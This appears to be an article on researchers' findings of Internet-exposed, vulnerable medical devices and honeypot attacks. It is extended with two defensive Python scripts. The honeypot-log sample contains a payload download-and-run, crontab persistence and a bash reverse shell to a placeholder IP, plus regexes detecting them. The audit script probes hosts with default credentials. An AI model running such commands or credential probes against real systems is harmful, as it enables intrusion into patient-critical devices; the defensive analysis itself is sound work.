Too many vulnerable medical systems can be found online
How many critical medical systems can be found on the Internet, accessible to and hackable by remote attackers? According to security researchers Scott Erven and Mark Collao, too many.
Erven, an associate director at consulting firm Protiviti who focuses on healthcare IT security, and Collao, a security consultant at Neohapsis, have used Shodan, a search engine for Internet-connected devices, to discover medical devices that might be exposed to attack.
They found many: radiology equipment, anaesthesia systems, cardiology equipment, and so on. A Shodan search for "anaesthesia" also turned up a public-facing system that was not an anaesthesia workstation at all, but a misconfigured external system leaking intelligence about the healthcare organization's entire network, medical devices included.
The number of exposed healthcare organizations they found was over a thousand. One particular large US healthcare system exposed intelligence on over 68,000 systems and provided direct attack vectors to them. Among these were 21 anaesthesia, 488 cardiology, 133 infusion, 323 PACS, 31 pacemaker, 67 nuclear medicine systems, and 97 MRI scanners.
They were able to collect enough information about the organization to enable both physical and pivot attacks (the latter by exploiting an old Windows XP vulnerability in the Internet-facing system, then using that foothold to reach backend networks and medical devices with known vulnerabilities).
The vulnerabilities found are typically weak default or hardcoded admin credentials, unencrypted data transmission, service authorization flaws, and known software vulnerabilities in legacy devices that are no longer updated or patched.
Erven shared a number of vulnerabilities he has found in medical systems over the past year (and responsibly disclosed to the manufacturers), and praised General Electric for its prompt response and good collaboration with security researchers.
Finally, they described their attempt to find out who targets these systems and why: they set up ten realistic honeypots and waited for trespassers. They recorded over 55,000 successful SSH/web logins, 24 successful exploits of vulnerabilities, and nearly 300 dropped malware samples. The top three countries of origin for the attacks were the Netherlands, China and Korea.
The good news is that attackers usually do nothing once inside the system – most, if not all, probably don't even realize what kind of system they have gained root on. They drop a malicious payload to gain persistence and have it call back to a C&C server.
Still, the C&C operators apparently do not know what kind of information they now have access to. There is no evidence of intentional targeted attacks – yet.
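The honeypot findings above (logins, then a dropped payload, a persistence mechanism and a callback to a C&C host, with many intruders doing nothing at all) are the kind of thing a defender wants pulled out of honeypot logs automatically. The script below is an added example, not the researchers' honeypot tooling: the log lines, the simplified one-line-per-event format, the IP-to-country map and the indicator patterns are all constructed for illustration, and a real deployment would feed in its honeypot's own event log and a GeoIP lookup instead.

```python
"""Summarise what honeypot trespassers did after logging in.

Added example, not the researchers' honeypot code. Log lines, the
IP-to-country map and the event format below are constructed."""
import re
from collections import Counter

# Constructed mapping standing in for a GeoIP lookup (assumption).
GEO = {"198.51.100.7": "NL", "198.51.100.8": "CN", "203.0.113.99": "KR"}

# One event per line: <timestamp> <source ip> <login|cmd> <details>
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<kind>login|cmd) (?P<rest>.*)$")

# Indicators for the three post-login behaviours the article describes.
PERSISTENCE_RE = re.compile(r"crontab|/etc/rc\.local|/etc/init\.d|\.bashrc|authorized_keys")
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp)\b.*?(?P<host>\d{1,3}(?:\.\d{1,3}){3})")
CALLBACK_RE = re.compile(r"(?:\bnc\b|\bncat\b|/dev/tcp/)\s*(?P<host>\d{1,3}(?:\.\d{1,3}){3})")

# Constructed sample log (RFC 5737 documentation addresses only).
SAMPLE_LOG = """\
2015-10-01T03:14:07Z 198.51.100.7 login failed root:password
2015-10-01T03:14:09Z 198.51.100.7 login success root:123456
2015-10-01T03:14:12Z 198.51.100.7 cmd wget http://192.0.2.5/x.sh -O /tmp/x.sh
2015-10-01T03:14:13Z 198.51.100.7 cmd chmod +x /tmp/x.sh; /tmp/x.sh
2015-10-01T03:14:15Z 198.51.100.7 cmd (crontab -l; echo '@reboot /tmp/x.sh') | crontab -
2015-10-01T04:02:41Z 198.51.100.8 login success admin:admin
2015-10-01T04:02:44Z 198.51.100.8 cmd uname -a
2015-10-01T04:02:50Z 198.51.100.8 cmd bash -i >& /dev/tcp/192.0.2.9/4444 0>&1
2015-10-01T05:30:02Z 203.0.113.99 login failed admin:1234
2015-10-01T05:30:05Z 203.0.113.99 login success admin:admin
"""


def parse(log_text):
    """Turn log text into a list of event dicts; unparseable lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def summarize(events, geo=GEO):
    """Per-source summary: successful logins, countries of origin, and what
    each intruder did after login (payload download, persistence, callback)."""
    logins = Counter()
    countries = Counter()
    actions = {}
    c2_hosts = set()
    for e in events:
        src = e["src"]
        if e["kind"] == "login":
            if e["rest"].startswith("success"):
                logins[src] += 1
                countries[geo.get(src, "??")] += 1
            continue
        cmd = e["rest"]
        tags = actions.setdefault(src, set())
        if PERSISTENCE_RE.search(cmd):
            tags.add("persistence")
        m = DOWNLOAD_RE.search(cmd)
        if m:
            tags.add("payload-download")
            c2_hosts.add(m.group("host"))
        m = CALLBACK_RE.search(cmd)
        if m:
            tags.add("callback")
            c2_hosts.add(m.group("host"))
    return {
        "successful_logins": sum(logins.values()),
        "top_countries": countries.most_common(3),
        "actions": {s: sorted(t) for s, t in actions.items()},
        # Logged in but never ran a tagged command: the "did nothing" majority.
        "idle_after_login": sorted(s for s in logins if not actions.get(s)),
        "c2_hosts": sorted(c2_hosts),
    }


if __name__ == "__main__":
    for key, value in summarize(parse(SAMPLE_LOG)).items():
        print(f"{key}: {value}")
```

The useful output is not the login count (brute-force noise is a given) but the `c2_hosts` list and the per-source action tags: those are what a hospital SOC can turn into egress blocks and into a check of whether any real device on the network has the same download or callback pattern.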
But there is no doubt that things must change if patients' safety and privacy are to be assured. In the meantime, organizations should check their own devices for default credentials and known vulnerabilities, and demand fixes from manufacturers.
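The closing recommendation, and the vulnerability classes listed earlier (default or hardcoded credentials, cleartext services, unpatched legacy operating systems behind an Internet-facing host), can be turned into a self-audit an organization runs against its own externally visible hosts. The script below is an added example and not the researchers' tooling: the banner records are constructed to resemble Shodan search hits for an organization's own address range, the keyword list and default-credential list are illustrative assumptions, and the login attempt is injected as a callback so that the same code can be driven by a real Telnet/SSH login in an authorized audit and by a stub here.

```python
"""Self-audit of Internet-facing hosts for the exposure classes the article
describes. Added example, not the researchers' tooling. The banner records,
keyword list and credential list below are constructed for illustration."""
import re
from dataclasses import dataclass, field

# Banner keywords suggesting a medical device (assumption: illustrative list).
MEDICAL_KEYWORDS = ("anaesthesia", "anesthesia", "pacs", "dicom", "infusion",
                    "radiology", "cardiology", "mri", "telemetry")

# Services that carry credentials or sessions in clear text (assumption).
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 80: "http", 104: "dicom"}

# Operating systems that no longer receive patches: a pivot risk if exposed.
LEGACY_OS_RE = re.compile(r"windows (xp|2000|server 2003)", re.I)

# Constructed default-credential list; vendor manuals and public
# default-password lists are the real source for such a list.
DEFAULT_CREDS = [("admin", "admin"), ("admin", ""), ("root", "root"),
                 ("service", "service")]


@dataclass
class Finding:
    ip: str
    port: int
    issues: list = field(default_factory=list)


def triage_banner(rec):
    """Classify one Shodan-style record {'ip_str', 'port', 'data', 'os'}."""
    f = Finding(rec["ip_str"], rec["port"])
    text = (rec.get("data", "") + " " + (rec.get("os") or "")).lower()
    if any(k in text for k in MEDICAL_KEYWORDS):
        f.issues.append("medical-device banner exposed to the Internet")
    if rec["port"] in CLEARTEXT_PORTS:
        f.issues.append(f"cleartext service ({CLEARTEXT_PORTS[rec['port']]})")
    if LEGACY_OS_RE.search(text):
        f.issues.append("unsupported legacy OS (pivot risk)")
    return f


def check_default_creds(host, port, try_login, creds=DEFAULT_CREDS):
    """Return the first default pair that try_login(host, port, user, pw)
    accepts, or None. try_login is injected: a paramiko/telnetlib login in a
    real, authorized audit; a stub in tests."""
    for user, pw in creds:
        if try_login(host, port, user, pw):
            return (user, pw)
    return None


def audit(records, try_login):
    """Triage every record; probe default credentials only on flagged hosts."""
    findings = []
    for rec in records:
        f = triage_banner(rec)
        if f.issues:
            hit = check_default_creds(f.ip, f.port, try_login)
            if hit:
                shown = hit[1] or "<empty>"
                f.issues.append(f"accepts default credentials {hit[0]}:{shown}")
            findings.append(f)
    return findings


# Constructed sample records (RFC 5737 documentation addresses only).
SAMPLE = [
    {"ip_str": "203.0.113.10", "port": 23, "os": "Windows XP",
     "data": "Anaesthesia Workstation AW-200 login:"},
    {"ip_str": "203.0.113.11", "port": 443, "os": None,
     "data": "HTTP/1.1 200 OK\r\nServer: nginx\r\n"},
    {"ip_str": "203.0.113.12", "port": 104, "os": None,
     "data": "DICOM C-ECHO responder PACS-ARCHIVE"},
]


def fake_login(host, port, user, pw):
    """Stub standing in for a real login attempt (assumption: only the XP
    host accepts admin/admin)."""
    return host == "203.0.113.10" and (user, pw) == ("admin", "admin")


if __name__ == "__main__":
    for f in audit(SAMPLE, fake_login):
        print(f.ip, f.port, "; ".join(f.issues))
```

Run only against hosts you are authorized to test; a login probe against a production anaesthesia or infusion system is itself a patient-safety risk, which is why the example limits credential probing to hosts the banner triage has already flagged and keeps the login routine pluggable.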